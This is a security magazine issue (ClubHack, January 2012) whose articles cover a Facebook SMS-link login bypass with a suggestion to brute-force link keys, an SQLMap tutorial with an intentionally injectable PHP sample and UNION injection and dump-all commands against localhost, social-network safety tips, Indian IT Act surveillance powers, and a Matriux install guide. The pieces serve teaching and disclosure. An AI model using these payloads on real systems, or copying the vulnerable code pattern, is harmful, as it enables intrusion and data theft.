SlideShare une entreprise Scribd logo

ClubHack Magazine Issue January 2012

ClubHack
ClubHack

Happy new year guys. Hope you have a great year head. This issue is not theme based. You will read about how Facebook's authentication and security can be bypassed, learn how Facebook apps can be bad. More to read on SQLMap, Matriux and IT Law. You can send us your aticles, feedback at info@chmag.in

TechnologieDesign
1  sur  24
Télécharger pour lire hors ligne
Issue 24 – Jan 2012 | Page - 1
Issue 24 – Jan 2012 | Page - 2
Issue 24 – Jan 2012 | Page - 3 which does not contain any user specific One Link Facebook information. The link mentioned above is generated by Can Facebook accounts be hacked? Is it be Facebook by its URL shortening feature. possible to access your account without your The original link behind this shorten URL permission and without knowing your looks like username and password? Unfortunately http://m.facebook.com/story.php?share_id ―YES‖ is the answer. =xxxxxxxxxxxxxxxx&mlid=xxxxxxxxxx&l=x xxxxxxx Yes it is possible and that too with a single link, a link which can bypass all the This is the link generated for your shared authentication and security mechanism content on Facebook, so whenever someone implemented by Facebook for user security comments on your shared content this link and privacy. No need of username, is generate and sent to your registered cell password, no checkpoint, and neither any phone number with the comment made. geo-location restriction, most importantly Here ―share_id‖ is the unique id of the share there is no active session created, so a user content, ―mlid‖ is the unique numeric id of will never be able to know that someone the Facebook and ―l‖ is the 8 character long accessed his/her account. random string, combination of numbers and alphabets in both caps. To make this link What we need is just a key, a random working one need to know only the value of combination that can hit the lock and open ―mlid‖ and the ―l‖, the value of ―share_id‖ it for you. One of the most interesting link does not matter for this. looks like http://fb.me/xxxxxxxxxxxxxx, where series of ―x‖ are the 14 digit random And there is one more type of the link, this key with numbers and alphabet in both is the link generated when someone caps, here targeting this particular link can comments on your photo or comments on a be more beneficial as it can harvest many photo after your comment or tag you in a accounts. This is the only link generated by photo. The link looks like Facebook with its URL shortening feature
Issue 24 – Jan 2012 | Page - 4 http://m.facebook.com/photo.php?pid=xxx receive a notification by SMS and this will xxx&id=xxxxxxxxxxxxxxxx&mlid=xxxxxxxx contain this link. Here we simply cannot xx&l=xxxxxxxx neglect the threat of social engineering as the link is on your cell phone and anyone Here ―pid‖ is the unique id of the photo on who can access your phone can also access which the comment is made or tagging is your account. done, ―id‖ is the unique Facebook user id of the user who made the comment or tagged Facebook now fixed it a bit, earlier one key you in, or we can say that it is the Facebook (―l‖) was used repeatedly for two weeks, but user id of the user due to whose action this now it is fixed to expire after every use. Here link and notification is generated, ―mlid‖ fact is that very few users user this link so it and ―l‖ are the same as they were in the would not expire for those unused links. previous mentioned link. Only ―mlid‖ and The only way by which one can prevent ―l‖ are needed for the link to work and the his/her account from being accessed this remaining two can be any random value. way is by not opting for receiving the Then as the link discusses first is the notification by SMS or if already registered shortened for of the link generated for the then by opting out from this service, i.e. to share content, the same is true for this link, avoid it totally. but the shortened for look slightly different A full disclosure can be read here http://fb.me/p/xxxxxxxxxxxxxxx.yyyyyyyy http://withanand.blogspot.com/2011/12/fa cebook-security-bypassed-with-just.html Here series of ―x‖ is the same as the ―id‖ in with a video demonstration. the long URL and ―y‖ as the value of ―l‖ A question arises what can be done using this particular method to hack and access the account? Here a hacker can run a script to check all the possible combinations for a successful entry and can get the access to millions of random Facebook accounts and if lucky may even get the access to Mark Zuckerberg‘s profile, seems scary, well this is just the tip of the ice berg. This link is generated by Facebook itself for the convenience of those users who choose Anand Pandey to receive the notification by SMS on their anandkpandey1@gmail.com cell phone and it will give them direct access Anand Kishore Pandey, has just begin to their account without the need or his journey in the world of cyber security entering username and password every time and works as an Associate Consultant in to view who commented or liked etc. Every K R Information Security Solutions and time someone comments on your photo, or is responsible to conduct Vulnerability on your link, tag you in or comment after Assessment, Penetration Testing and your comment on a photo or link you will ISO 27001 Implementation.
Issue 24 – Jan 2012 | Page - 5 A sample code – SQLMAP – Automated Sql Injection Testing <?php $id=$_GET["id"]; Tool $con = mysql_connect("localhost","db- admin","db-name"); Sql injection is one of the most common if (!$con) vulnerability found in web applications { today. Exploiting SQL Injection through die('Could not connect: ' . manual approach is somewhat tedious. mysql_error()); Using flags like ―or 1=1--‖ , ―and 1>2‖ we can } find out if vulnerability is present but mysql_select_db("table-name", exploiting the vulnerability needs altogether $con); different approach. Tools like Sqlmap, Havij $query= "SELECT * FROM table- and Pangolin are helpful in exploiting sql name where id=$id "; injection. echo "<h1>".$query. "</h1>"; $result = mysql_query($query); In this article we will use a sample code while($row = below to showcase how vulnerability can be mysql_fetch_array($result)) exploited manually and then by using { Sqlmap tool. echo $row['id'] . " " . $row['name']; echo "<br />"; } mysql_close($con); ?>
Issue 24 – Jan 2012 | Page - 6 Here we have deployed the application with the following code and accessed the url: http://localhost/xampp/1.php?id=1 Which gives us the data present in db for id=1 For order by 4, data retrieved is error that means there are three columns present in this select query. Now, we would play with the url, to dig more details about database. If we give a single quote(‗) in the end of the We have given url as - query we get below screen with unhandled http://localhost/xampp/1.php?id=1 union error message from database. This shows select system_user(), 1, 2from there is a possibility of SQL injection. information_schema.schema_privileges— This would give system user of the database. If we add ―or 1=1‖ in the end of URL we get all the data from that row. This shows that SQL Injection is possible. Similarly, we would find table name, table_schema, columns and data by manipulating the url like given below http://localhost/xampp/1.php?id=1 union select table_name, 1, 2 from information_schema.columns— However, whatever exercise we did to find vulnerability in the web application Now let‘s get into exploiting the manually, can be done using SQLMap Tool vulnerability. Our first task is to find in few minutes. To use this tool, you just number of columns selected in the query. need a python Interpreter and SqlMap tool. We would find that by adding ―order by id=1,2,3…‖ and so on at the end of the URL. We issue following command - sqlmap.py -u http://localhost/xampp/1.php?id= 1 and lots of information about given web application is retrieved in seconds like:
Issue 24 – Jan 2012 | Page - 7 GET parameter ‗id‘ is vulnerable and 3 We would now try to find current database, columns are present in the given table. tables, columns, and data, means, complete surgery of the application. So we can give below command options to find all details about the application. sqlmap.py -u http://localhost/xampp/1.php?id= 1 --current-db It gave the name of current database. Let‘s proceed. We got to know that DBMS is MySql 5.0.11, WebServer is Apache 2.2.17 deployed on windows machine. Now, the time is to know all the tables present. sqlmap.py -u http://localhost/xampp/1.php?id= 1 --tables It gave the list of all the tables present in databases.
Issue 24 – Jan 2012 | Page - 8 Shahbaz Shantanu Shukla Finally, to retrieve all the data present in database, following command can be used: Shantanu Shukla and Shahbaz both sqlmap.py -u work as Systems Engineer, Enterprise http://localhost/xampp/1.php?id= Security and Risk Management-Cloud, 1 --dump-all Infosys Limited. Shantanu and Shahbaz All the date is retrieved and saved in output did their B.tech in Computer Science folder of sqlmap directory. from Uttar Pradesh Technical University Tool has lot more capabilities and can be in year 2010 used to perform dictionary attacks, create backdoor shell etc. So try it out and Happy hacking 
Issue 24 – Jan 2012 | Page - 9
Issue 24 – Jan 2012 | Page - 10
Issue 24 – Jan 2012 | Page - 11 Social Networking This is the bright and beautiful side of the and its Application social networking considering the following reasons: Security 1. You get to meet your friends, make more and more friends. Social Networks have been an important 2. Be ―cool‖ in your circle virtually part of our life, yes, we tweet for photos we 3. Do things virtually you can‘t in real click, every moment of happiness, sadness life ( Farming, Gamble, construction and the news around, we update our status etc.) if we start a relationship or end one, or even 4. Makes you feel the world is small by travel itinerary and hotel check-ins, movie connecting you to friends and moments, fun with friends, in fact relatives in any part of the world. everything that we do every moment in our life is open to the world we want to share. Play games with friends and make new friends.
Issue 24 – Jan 2012 | Page - 12 Also considering the other possible reasons Though there are many reasons for the where social networking sites also form the popularity and also their good impact on best means for reconnaissance for any our life yet as everything has its dark side, hacker, with everyone‘s profile online and even Social Networking is no exception to with every detail to establish your identity that. or details that could help the attacker in any means. This again, is available very easily Security Issues of Social the best easy access to any ones Networking: information. 1. Spam Social Networking sites have been the best 2. Scam boons for Social Engineers, considering the 3. Identity theft case study of a popular American politician 4. Malicious Apps (not named due to various reasons, however 5. Abuse of Trust a simple Google search may help you find more information) whose email account was Why do they work? hacked by just making it out of the information available online made amass Observing the fact that Social Networking news in the world media. sites which now are the best place to find people at a single place gives the attackers a Reason? huge attack surface. People gain trust easily on Social Networking sites, just by a mere Attackers just used the information of her chat and looking at their profile. Trust is available online. Since she was a popular easily gained which requires zero skills of politician attackers only used information hacking. I can possibly classify these available through sites like Google and reasons as:- Wikipedia to answer the security questions 1. Greed she had for her email accounts. This 2. Ignorance questions the true reach of social 3. Fear engineering making it reach beyond the 4. Easy trust expected limitations. Was being popular a reason for that compromise of the account 5. Curiosity or was that really unsecure? To answer this let us understand what made the hack successful.  Security questions were something that was easily available online The purpose of security question is understood as something which is personal to you and the one only you know about it and no one else in this world.
Issue 24 – Jan 2012 | Page - 13 How am I being a regular user Spamming affected? And now we have the new spamming Everyone on the social network is equally techniques being used. Recently a spam that affected in one way or the other, either a spread virally on Facebook installed a spam posting all over your wall on facebook extension to the browser and made posts on or either your profile without your notice the friends wall without the users consent. posting all over your friends wall. Most of This is how it looked. them would be embarrassing to you or your friends. This spam looked like any other video shared on the wall, using the name of the user whose wall this spam was shared this post looked genuine , however on clicking the link it asks you to install a YouTube premium extension to your browser to view the video. This extension then carried out the work of spamming. Leaving many confused for what was the reason and how to stop this embarrassing spam from coming through their profile. Many believed Popular issues on Facebook their Facebook account was hacked unable to find the reason, on how this was We have across many spam issues right continuing. from the time we started using Orkut - starting with the ―New colorful theme‖ spam Applications to the ―mobile recharge spam‖ back those years. Many finding interesting games and applications on facebook and also there are other who are annoyed by these requests and posts from these applications. Applications / Games on facebook (which are generally thought to be) are not developed by facebook, rather facebook allows third party developers to host their games and applications on facebook. So it makes a new source for the attackers to build their base for a attacking source. Issues with applications on facebook can be
Issue 24 – Jan 2012 | Page - 14  Innumerable requests and notifications from your friends to join them using that application  Possible Spam or Scam  Possible Fraud. Have you ever cared to look at the permissions you provide while using an application? An average facebook profile is believed to Have you ever noticed what information the have authorized 200 applications with application is going to extract from your various access rights. profile. There is a survey which claims that 85% users don‘t bother to look at this How do I protect myself? permission request and allow those rights believing it to be a facebook application or Always remember that your actions online rather ignorance. on a social networking should be in such a way that it won‘t embarrass the ones you are Other issues come with the addiction to sharing it with or rather land yourself in these apps or spending real money for such a situation. gaining extra access or unlocking some features in these apps which make no sense  Don‘t establish trust with any friend in our life. on social networking sites until you make sure is actually your friend. It must be already possible that you have  Read the permissions you provide installed most of the unwanted apps on your while using an application over the facebook, just look at your apps setting tab site. and I am sure it will surprise you!  Also make sure the application you are going to authorize is trusted.  Never fall for free stuff unless it is from a valid source. For, example if there would a new facebook theme available then it won‘t be from a
Issue 24 – Jan 2012 | Page - 15 third source rather facebook would itself announce the launch of new themes to its users.  While viewing the external links shared on the Social networking site, make sure the URL is valid.  In case of a video shared make sure the URL is youtube.com rather than believing the thumbnail it generates. Prajwal Panchmahalkar Panchmahalkar@gmail.com Twitter: @pr4jwal  If you look into the above snap you can clearly notice the URL is Prajwal is a Senior Developer at www.youtube.com and also notice Matriux, publishing articles for CHmag the play button present over there, under ―Matriux Vibhag‖ every month. unlike the spam post thumbnail Also a n|u Hyderabad chapter lead. shared earlier Currently pursuing Masters from Texas  Stay away from scams/spams that Tech University, USA. A CEH v6 promise to provide some gift or certified. money.  Use add-ons like no-script, No-Ads to avoid such scripts.  Always install extensions from known sources o Chrome – from chrome store o Firefox – Mozilla add-ons  Make sure you use these social networking sites over secured HTTPS  Share or post only that information which doesn‘t affect any one or you in general.  In fact a simple thought of ―what am I doing?‖ and ―how will this make effect?‖ before every action online can save you from the security issues.
Issue 24 – Jan 2012 | Page - 16 Powers of As per the provision Central or State Government or any of its officers for reasons Government under to be recorded in writing, by order, direct any agency of the appropriate Government the Information to intercept, monitor or decrypt or cause the Technology Act, 2000 same to do any information generated, transmitted, received or stored in any computer resource, if satisfied that it is Internet Censorship is today‘s hot topic with necessary or expedient so – the passage of statements by our Honorable Ministers. But the billion dollars question is  In the interest of the sovereignty or ―Can online activities of individuals be integrity of India or censored/monitored in India?‖  Defense of India or  Security of the State or  Friendly relations with foreign States Provisions under the Information or Technology Act, 2000 (IT Act)  To maintain public order or  For preventing incitement to the Sec. 69 - Power to issue directions for commission of any cognizable interception or monitoring or offence or decryption of any information  For investigation of any offence through any computer resource.
Issue 24 – Jan 2012 | Page - 17 The subscriber or intermediary or any hosted in any computer resource for the person in-charge of the computer resource reasons mentioned above under Sec. 69. shall, when called upon by any agency, Government has passed the Information extend all facilities and technical assistance Technology (Procedure and Safeguards for to – Blocking for Access of Information by Public) Rules, 2009 to be read with Sec. 69A  Provide access to or secure access to (2). These rules explain the procedure and the computer resource generating safeguards subject to which such blocking transmitting, receiving or storing for access by the public may be carried out. such information; or  Intercept, monitor, or decrypt the The intermediary, who fails to comply with information, as the case may be; or the direction issued under this Section, shall  Provide information stored in be punished with an imprisonment for a computer resource. term which may extend to seven years and also be liable to fine. Further government has also passed the Information Technology (Procedure and Safeguards for Interception, Monitoring and Sec. 69B - Power to authorize to Decryption of Information) Rules, 2009 to monitor and collect traffic data or be read with Section 69 (2). These rules information through any computer explain the procedure and safeguards resource for cyber security. subject to which such interception or monitoring or decryption may be carried The Central Government may, to enhance out. cyber security and for identification, analysis and prevention of intrusion or If the subscriber or intermediary or any spread of computer contaminant in the person who fails to assist the agency, they country, by notification in the Official shall be punished with imprisonment for a Gazette, authorize any agency of the term which may extend to seven years and Government to monitor and collect traffic shall also be liable to fine. data or information generated, transmitted, received or stored in any computer resource. Sec. 69A - Power to issue directions The intermediary or any person in-charge or for blocking for public access of any the computer resource shall provide information through any computer technical assistance and extend all facilities resource to such agency to enable them online access or to secure and provide online access to the Central Government or any of its authorized computer resource generating, transmitting, official for reasons to be recorded in writing, receiving or storing such traffic data or by order, direct any agency of the information. Government or intermediary to block for Government has passed the Information access by the public or cause to be blocked Technology (Procedure and Safeguards for for access by the public any information Interception, Monitoring and Decryption of generated, transmitted, received, stored or Information) Rules, 2009 which explains the procedure and safeguards for
Issue 24 – Jan 2012 | Page - 18 monitoring and collecting traffic data or information. Any intermediary who intentionally or knowingly contravenes the provisions of this Act shall be punished with an imprisonment for a term which any extend to three years and shall also be liable to fine. Apart from these provisions the Privacy Act, 2011 has also been drafted and is in the final stages of the passage. The Act has been enacted to provide Right to Privacy to citizens of India which is guaranteed under Article 21 of the Constitution of India. The Act regulates the collection, maintenance, use, and dissemination of the personal information of the citizens of India and also Sagar Rahurkar provides for the penal action in case of contact@sagarrahurkar.com violation of such rights. These rules shall be read with the relevant provisions of the IT Sagar Rahurkar is a Law graduate. He is Act. a techno-legal consultant and a Senior Faculty at Asian School of Cyber Laws. He specializes in Cyber Law, Cyber Crime Investigation, Computer Forensics and Intellectual Property Laws. He teaches and provides consultancy to corporates, law enforcement agencies and education institutes across India. He can be contacted at contact@sagarrahurkar.com.
Issue 24 – Jan 2012 | Page - 19
Issue 24 – Jan 2012 | Page - 20 Setting up and and simple application to install the Live Getting started with system. Matriux Krypton Getting Started: If you are installing on Hard Disk Drive, Hi Reader, start from "Step 5". Wish you a very happy and prosperous new Step 1: year from team Matriux. 2011 has been a great year for us where we along with Start the virtual box and click ―New‖ and CHmag have made it possible to reach you select Operating System as ―Linux‖ and better. A special thanks to CHmag team for Version as Debian. making it with us. It has been noticed that due to a custom and special installer MID used in Matriux Krypton, many users are confused on how to get Matriux setup on their Hard disk or VirtualBox, so this month we bring you with how to setup and get started with Matriux Krypton, a better way to start 2012. We will also try to make it possible to keep it easy for the new *nix users to understand it and get easy with Matriux. MID: Matriux Disk Installer, named MID is an Step 2: installer specially developed by Mickaël Schoentgen in contribution with Prajwal In this step allocate some RAM to be used Panchmahalkar, inspired by the pureOS by Matriux generally 300MB is version of Debian installer for the version of recommended, however there were no Matriux Krypton making it more compatible problems even with 256MB
Issue 24 – Jan 2012 | Page - 21 Step 3: Step 5: Create a Virtual Hard Disk for the Start Matriux in live mode (for hard disk installation (VDI, VMDK is preferred) installation, insert the Disc and boot from usually more than 6GB is recommended. the CD/DVD in the live mode). Step 4: After these start the Virtual machine, since Step 6: it is the first time it will prompt us so that a Disk Image (ISO image) can be mounted. Type the password as toor when prompted. Browse and locate the ISO image. (From here note that ―toor‖ is the root password for Matriux ).
Issue 24 – Jan 2012 | Page - 22 Step 7: Step 10: Open up a terminal and type gparted to Now start the Matriux Installer from the start the gparted interface. desktop and It should be easy for you now. If it is a new unallocated partition then Device > Create Partition (else if it is a used disk space then skip the next step and go to formatting it). Step 8: Now create the partitions. Format the Step 11: partitions and close gparted. Go ahead and choose the partition that we Step 9: mounted in the earlier steps. Now open a terminal and mount the partition we just created. mkdir /mnt/matriux mount /dev/sda1 /mnt/matriux
Issue 24 – Jan 2012 | Page - 23 Step 12: If you are having a multiple boot at certain step you can choose to install the grub. After a couple of basic steps you will find this – Team Matriux http://matriux.com/ That‘s it we are done. Happy hacking  For any further details/queries mail @ report@matruix.com Follow us at @matriuxtig3r on twitter and http://facebook.com/matriuxtig3r
Issue 24 – Jan 2012 | Page - 24

Recommandé

The Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianThe Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianClubHack
 
Summarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatSummarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatClubHack
 
Cyber Insurance
Cyber InsuranceCyber Insurance
Cyber InsuranceClubHack
 
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreCyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreClubHack
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleClubHack
 
Spam Detection with a Content-based Random-walk Algorithm (SMUC'2010)
Spam Detection with a Content-based Random-walk Algorithm (SMUC'2010)Spam Detection with a Content-based Random-walk Algorithm (SMUC'2010)
Spam Detection with a Content-based Random-walk Algorithm (SMUC'2010)Javier Ortega
 
India legal 31 october 2014
India legal 31 october 2014India legal 31 october 2014
India legal 31 october 2014ClubHack
 
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...ClubHack
 

Recommandé

The Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianThe Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianClubHack
 
Summarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatSummarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatClubHack
 
Cyber Insurance
Cyber InsuranceCyber Insurance
Cyber InsuranceClubHack
 
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreCyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreClubHack
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleClubHack
 
Spam Detection with a Content-based Random-walk Algorithm (SMUC'2010)
Spam Detection with a Content-based Random-walk Algorithm (SMUC'2010)Spam Detection with a Content-based Random-walk Algorithm (SMUC'2010)
Spam Detection with a Content-based Random-walk Algorithm (SMUC'2010)Javier Ortega
 
India legal 31 october 2014
India legal 31 october 2014India legal 31 october 2014
India legal 31 october 2014ClubHack
 
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...ClubHack
 
Smart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodSmart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodClubHack
 
Legal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalLegal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalClubHack
 
Infrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathInfrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathClubHack
 
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
 
Hacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyHacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyClubHack
 
Critical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiCritical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiClubHack
 
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaContent Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaClubHack
 
XSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiXSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiClubHack
 
Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012ClubHack
 
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack
 
ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack
 
ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack
 
ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack
 
One link Facebook (Anand Pandey)
One link Facebook (Anand Pandey)One link Facebook (Anand Pandey)
One link Facebook (Anand Pandey)ClubHack
 
Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)
Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)
Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)ClubHack
 
Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)ClubHack
 
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)ClubHack
 
How Android Based Phone Helped Me Win American Idol (Elad Shapira)
How Android Based Phone Helped Me Win American Idol (Elad Shapira)How Android Based Phone Helped Me Win American Idol (Elad Shapira)
How Android Based Phone Helped Me Win American Idol (Elad Shapira)ClubHack
 
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)ClubHack
 
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)ClubHack
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 

Contenu connexe

Plus de ClubHack

Smart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodSmart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodClubHack
 
Legal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalLegal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalClubHack
 
Infrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathInfrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathClubHack
 
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
 
Hacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyHacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyClubHack
 
Critical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiCritical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiClubHack
 
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaContent Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaClubHack
 
XSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiXSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiClubHack
 
Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012ClubHack
 
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack
 
ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack
 
ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack
 
ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack
 
One link Facebook (Anand Pandey)
One link Facebook (Anand Pandey)One link Facebook (Anand Pandey)
One link Facebook (Anand Pandey)ClubHack
 
Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)
Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)
Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)ClubHack
 
Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)ClubHack
 
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)ClubHack
 
How Android Based Phone Helped Me Win American Idol (Elad Shapira)
How Android Based Phone Helped Me Win American Idol (Elad Shapira)How Android Based Phone Helped Me Win American Idol (Elad Shapira)
How Android Based Phone Helped Me Win American Idol (Elad Shapira)ClubHack
 
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)ClubHack
 
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)ClubHack
 

Plus de ClubHack (20)

Smart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodSmart Grid Security by Falgun Rathod
Smart Grid Security by Falgun Rathod
 
Legal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalLegal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara Agrawal
 
Infrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathInfrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy Hiremath
 
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
 
Hacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyHacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish Bomisstty
 
Critical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiCritical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh Belgi
 
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
